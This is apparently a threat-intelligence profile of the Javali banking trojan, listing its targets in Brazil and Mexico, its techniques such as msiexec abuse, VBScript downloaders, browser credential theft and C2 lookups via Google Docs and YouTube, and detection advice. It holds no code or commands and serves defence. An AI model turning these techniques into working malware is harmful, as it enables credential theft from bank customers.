The malware known as Javali targets Portuguese and Spanish-speaking countries, primarily focusing on customers of financial institutions in Brazil and Mexico. Javali affects the following operating systems: ['Windows'] and can monitor processes for open browsers and custom banking applications. Javali can download payloads from remote C2 servers. Javali has used the MSI installer to download and execute malicious payloads. Javali has achieved execution through victims clicking links to malicious websites. Javali has used embedded VBScript to download malicious payloads from C2. Javali has been delivered as malicious e-mail attachments.
Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge. Javali can use large obfuscated libraries to hinder detection and analysis. Javali can read C2 information from Google Documents and YouTube. Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.
Javali Malware Capabilities:
Javali may attempt to get information about running processes on a system in order to gain an understanding of common software/applications running on systems within the network. Additionally, Javali may abuse msiexec.exe to proxy execution of malicious payloads and may also abuse Visual Basic for execution. Furthermore, Javali may send spearphishing emails with a malicious attachment or link in an attempt to gain access to victim systems. Finally, Javali may acquire credentials from web browsers by reading files specific to the target browser.
- Javali may attempt to get information about running processes on a system in order to gain an understanding of common software/applications running on systems within the network. Additionally, Javali may transfer tools or other files from an external system into a compromised environment in order to spread malicious payloads.
- The Javali adversary may use various methods to gain execution on victim systems, including spearphishing emails with malicious attachments, clicking on links leading to code execution, or exploiting vulnerabilities in applications or browsers. Once execution is gained, the adversary may attempt to gain access to sensitive data or systems on the victim network.
- The Javali group is a cybercriminal organization that uses spearphishing and other methods to gain access to victim systems. They may also side-load DLLs to execute malicious payloads.
- Javali may use binary padding or an existing, legitimate external Web service to host information that points to additional command and control infrastructure. An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution.
Ways to Mitigate Javali Malware Attacks Capabilities
The Javali malware attack can be mitigated by monitoring file creation and transfer, as well as process execution of msiexec.exe. Arguments used before and after msiexec.exe is invoked can help determine the purpose of the MSI files or DLLs being executed.
- Inspecting network traffic for indications of a malicious site visit, monitoring for events associated with VB execution, and using network intrusion detection systems and email gateways to detect spearphishing with malicious attachments.
- Monitoring process activity for unusual behavior, tracking DLL metadata, and inspecting URLs for links to known malicious sites. Additionally, web browser files that contain credentials can be monitored for file read events, and process execution logs can be monitored for PowerShell Transcription activity.
- Using file-based signatures to detect padded files, host data to supplement existing indicators of compromise, and user behavior monitoring to detect abnormal patterns of activity.